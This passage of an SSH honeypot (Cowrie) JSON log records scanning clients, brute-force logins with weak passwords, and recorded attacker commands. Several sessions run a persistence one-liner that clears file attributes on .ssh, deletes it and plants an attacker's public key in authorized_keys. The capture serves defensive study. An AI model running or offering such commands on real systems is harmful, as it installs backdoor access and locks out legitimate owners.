0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:23:08.785207Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57768,"dst_ip":"1.2.3.4","dst_port":22,"session":"f5c620b250de","protocol":"ssh","message":"New connection: 212.227.235.229:57768 (1.2.3.4:22) [session: f5c620b250de]","sensor":"my-vps","timestamp":"2025-08-31T05:23:11.831375Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:23:12.495075Z","src_ip":"212.227.235.229","session":"f5c620b250de"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:23:12.495979Z","src_ip":"212.227.235.229","session":"f5c620b250de"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:15.220265Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.login.failed","username":"test","password":"password1","message":"login attempt [test/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:18.402012Z","src_ip":"212.227.235.229","session":"f5c620b250de"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:18.914860Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.command.input","input":"ssh -V","message":"CMD: ssh -V","sensor":"my-vps","timestamp":"2025-08-31T05:23:18.915533Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:20.316751Z","src_ip":"212.227.235.229","session":"f5c620b250de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","size":58,"shasum":"8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/8737483f9dc335904b0dacf8467784c20ab36ded9ac9b78bd025cc0566b8caff after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:20.726811Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.session.closed","duration":"13.3","message":"Connection lost after 13.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:20.727886Z","src_ip":"212.227.125.160","session":"a1a6b6131959"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":35464,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f8298d4e101","protocol":"ssh","message":"New connection: 201.148.180.50:35464 (1.2.3.4:22) [session: 2f8298d4e101]","sensor":"my-vps","timestamp":"2025-08-31T05:23:25.318897Z"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49934,"dst_ip":"1.2.3.4","dst_port":22,"session":"0985347cd852","protocol":"ssh","message":"New connection: 217.72.205.35:49934 (1.2.3.4:22) [session: 0985347cd852]","sensor":"my-vps","timestamp":"2025-08-31T05:23:26.722220Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:26.723326Z","src_ip":"217.72.205.35","session":"0985347cd852"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:23:26.979801Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:23:26.980447Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:27.697031Z","src_ip":"212.227.235.229","session":"f663772f2d5f"}
{"eventid":"cowrie.session.connect","src_ip":"151.47.119.51","src_port":4973,"dst_ip":"1.2.3.4","dst_port":22,"session":"5cb38568ddd6","protocol":"ssh","message":"New connection: 151.47.119.51:4973 (1.2.3.4:22) [session: 5cb38568ddd6]","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.027444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.028707Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.106126Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.447708Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:31.635547Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.636290Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.637396Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.708676Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:31.923277Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.923966Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.995481Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:31.996317Z","src_ip":"151.47.119.51","session":"5cb38568ddd6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47634,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e5f3c410ced","protocol":"ssh","message":"New connection: 212.227.125.160:47634 (1.2.3.4:22) [session: 9e5f3c410ced]","sensor":"my-vps","timestamp":"2025-08-31T05:23:32.258345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:23:32.756990Z","src_ip":"212.227.125.160","session":"9e5f3c410ced"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:23:32.757891Z","src_ip":"212.227.125.160","session":"9e5f3c410ced"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:33.763863Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
{"eventid":"cowrie.login.failed","username":"test","password":"password1","message":"login attempt [test/password1] failed","sensor":"my-vps","timestamp":"2025-08-31T05:23:34.902054Z","src_ip":"212.227.125.160","session":"9e5f3c410ced"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58736,"dst_ip":"1.2.3.4","dst_port":22,"session":"2f0729ddf03a","protocol":"ssh","message":"New connection: 212.227.235.229:58736 (1.2.3.4:22) [session: 2f0729ddf03a]","sensor":"my-vps","timestamp":"2025-08-31T05:23:35.442832Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:35.443809Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:35.718165Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:36.357448Z","src_ip":"212.227.125.160","session":"9e5f3c410ced"}
{"eventid":"cowrie.login.success","username":"root","password":"notes","message":"login attempt [root/notes] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:23:36.855712Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.closed","duration":"38.7","message":"Connection lost after 38.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:36.895568Z","src_ip":"212.227.235.229","session":"f663772f2d5f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:37.421092Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:23:37.421800Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:23:37.422848Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:37.692682Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
{"eventid":"cowrie.command.input","input":"uptime","message":"CMD: uptime","sensor":"my-vps","timestamp":"2025-08-31T05:23:37.693460Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:37.698194Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:23:38.741894Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:23:38.742571Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.019207Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.020124Z","src_ip":"212.227.235.229","session":"2f0729ddf03a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60370,"dst_ip":"1.2.3.4","dst_port":22,"session":"723d0b78896e","protocol":"ssh","message":"New connection: 212.227.235.229:60370 (1.2.3.4:22) [session: 723d0b78896e]","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.289383Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.290033Z","src_ip":"212.227.235.229","session":"723d0b78896e"}
{"eventid":"cowrie.session.connect","src_ip":"151.47.119.51","src_port":4518,"dst_ip":"1.2.3.4","dst_port":22,"session":"bdf48b7362de","protocol":"ssh","message":"New connection: 151.47.119.51:4518 (1.2.3.4:22) [session: bdf48b7362de]","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.341690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.342631Z","src_ip":"151.47.119.51","session":"bdf48b7362de"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.432054Z","src_ip":"151.47.119.51","session":"bdf48b7362de"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","size":69,"shasum":"dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802","duplicate":true,"duration":"1.8","message":"Closing TTY Log: var/lib/cowrie/tty/dd291cd6294bafef2a7e9c378eb320e87198d6dae214272addb569775750c802 after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.504332Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
{"eventid":"cowrie.session.closed","duration":"14.2","message":"Connection lost after 14.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:23:39.505392Z","src_ip":"201.148.180.50","session":"2f8298d4e101"}
